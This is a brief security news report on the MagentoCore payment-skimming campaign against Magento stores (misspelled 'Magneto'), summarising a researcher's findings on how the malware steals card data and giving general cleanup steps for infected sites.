- Security researcher Willem de Groot discovered hacking campaign targeting e-commerce website using Magneto.
- The campaign has already infected 7339 e-commerce site in the last 6 months.
- Attackers uses a skimming malware named MagnetoCore to infect the websites.
- The campaign is still ongoing and has been infecting 50-60 stores per day.
Security researchers have discovered a massive hacking campaign targeting Magneto stores using payment skimming malware named MagnetoCore.
The skimming malware is capable of stealing payment card data of users who purchase on the infected sites and has already infected 7339 e-commerce site in the last 6 months.
The campaign was discovered by security researcher Willem de Groot and said that “The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit. But the real victims are eventually the customers, who have their card and identity stolen.”
Working of MagnetoCore Malware
The malware attempts to gain access to the control panel of an e-commerce site using a brute force technique.
Once the access is gained, they inject a malicious piece of script into the HTML template. The script is designed to record all the keystrokes from the customers and sends to magentocore.net server registered in Moscow.
The data extracted includes usernames, password, payment card data and other personal details.
The malware also includes a recovery mechanism. Here in the case of Magneto software, it adds a backdoor to cron.php which will download the malicious code and delete itself after the process leaving no traces.
According to researcher campaign is still ongoing and has been infecting 50-60 stores per day.
What to do if you are infected with MagnetoCore Malware
- First, you need to find how attackers gained unauthorized access to your site. You can find it By analyzing backend access logs.
- After finding the entry point, you need to find backdoors installed in your site and unauthorized modification to your codebase.
- Then you need to close all unauthorized access point at once.
- After that remove the skimmer, backdoor, and other codes and Revert to a certified safe copy of the codebase.
For more details, you can visit the analysis published by the researcher here.
You may be interested in reading: Google’s Titan Security Key adds Another Layer of Protection to your Accounts